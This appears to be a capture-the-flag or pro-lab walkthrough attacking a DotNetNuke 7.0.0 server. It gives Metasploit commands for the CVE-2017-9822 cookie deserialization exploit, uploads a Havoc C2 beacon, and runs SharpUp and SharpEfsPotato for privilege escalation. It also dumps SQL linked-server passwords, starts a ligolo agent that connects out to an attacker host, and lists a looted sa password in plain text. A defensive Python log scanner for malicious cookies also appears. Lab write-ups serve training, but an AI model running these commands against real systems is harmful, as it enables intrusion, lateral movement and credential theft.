10.10.110.10, 10.9.20.13

The IP is hosting a DotNetNuke (DNN) website.

The page source shows that the website dates from 2017 and is running version 7.0.0.

A quick Google search for DNN leads to the following exploit.

[CVE-2017-9822] DotNetNuke Cookie Deserialization Remote Code Execution (RCE)

Exploit Delivery and Execution

The simple and fast way to get access to this machine is to use the Metasploit exploit [`exploit/windows/http/dnn_cookie_deserialization_rce`](https://www.exploit-db.com/exploits/48336):

sudo msfconsole
use exploit/windows/http/dnn_cookie_deserialization_rce
set RHOSTS 10.10.110.10
set LHOST tun0
set LPORT 80
exploit

The same steps as a single command (here with LPORT 8081):

sudo msfconsole -q -x "use exploit/windows/http/dnn_cookie_deserialization_rce; set RHOSTS 10.10.110.10; set LHOST tun0; set LPORT 8081; exploit"
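
On the defensive side, requests exploiting CVE-2017-9822 can be found in web server logs. The following is an added example, not part of the original notes or of any tool mentioned here: it scans IIS W3C logs for a `DNNPersonalization` cookie that names .NET gadget types. It assumes `cs(Cookie)` logging is enabled; the marker list, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# .NET type names seen in public XmlSerializer gadget chains (assumed marker list; extend as needed).
GADGET_MARKERS = (
    "System.Data.Services.Internal.ExpandedWrapper",
    "System.Windows.Data.ObjectDataProvider",
    "DotNetNuke.Common.Utilities.FileSystemUtils",
)
COOKIE_RE = re.compile(r"(?:^|;[+\s]*)DNNPersonalization=([^;]*)", re.IGNORECASE)

# Constructed sample in IIS W3C format; cookie values are truncated, non-functional fragments.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status cs(Cookie)
2024-01-05 10:01:02 192.0.2.10 GET /Home 200 .ASPXANONYMOUS=abc;+language=en-US
2024-01-05 10:01:09 192.0.2.66 GET /nonexistent 404 DNNPersonalization=%3Cprofile%3E%3Citem+key%3D%22k%22+type%3D%22System.Data.Services.Internal.ExpandedWrapper%601%5B%5BSystem.Windows.Data.ObjectDataProvider%5D%5D%22%3E
2024-01-05 10:02:30 192.0.2.11 GET /Home 200 DNNPersonalization=%3Cprofile%3E%3C%2Fprofile%3E
"""

def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded cookie values are still inspected."""
    for _ in range(rounds):
        new = unquote_plus(value)
        if new == value:
            break
        value = new
    return value

def scan_w3c_log(text):
    """Return one finding per request whose DNNPersonalization cookie names a gadget type."""
    fields, findings = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names follow the "#Fields:" token
            continue
        if not line or line.startswith("#") or "cs(Cookie)" not in fields:
            continue
        row = dict(zip(fields, line.split()))
        match = COOKIE_RE.search(row.get("cs(Cookie)", ""))
        value = decode(match.group(1)).lower() if match else ""
        hits = [m for m in GADGET_MARKERS if m.lower() in value]
        if hits:
            findings.append({"ip": row["c-ip"], "uri": row["cs-uri-stem"],
                             "status": row["sc-status"], "markers": hits})
    return findings

if __name__ == "__main__":
    for finding in scan_w3c_log(SAMPLE_LOG):
        print(finding)
```

A cookie with an empty or ordinary profile, like the third sample line, is not flagged; only cookies whose decoded value contains one of the marker type names are reported.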
 

Uploading Havoc Beacon

cd All\ Users\\
upload demon_new.exe

The machine name is CYWEBDW$ and the OS is Windows Server 2019.

Host Recon - Running PrivEsc Checks

dotnet inline-execute /home/jay/prolabs/cybernatics/SharpUp.exe audit

Host Priv Esc

https://assume-breach.medium.com/home-grown-red-team-getting-system-on-windows-11-with-havoc-c2-cc4bb089d22

sliver (CASUAL_PLATFORM) > execute-assembly /home/jay/prolabs/cybernatics/SharpEfsPotato.exe -p CASUAL_PLATFORM.exe

Host Recon

The ps command shows the sqlbrowser service running.

https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/?tab=readme-ov-file

Upload all four files and execute them.

Pivoting: Setting up ligolo proxy

Pivoting

execute agent.exe -connect 10.10.15.207:8443 --ignore-cert

Loot

  • flag.txt
Instance   LinkedServer     Username Password  
--------   ------------     -------- --------  
SQLEXPRESS m3sqlw.m3c.local sa       RDO1uDB05g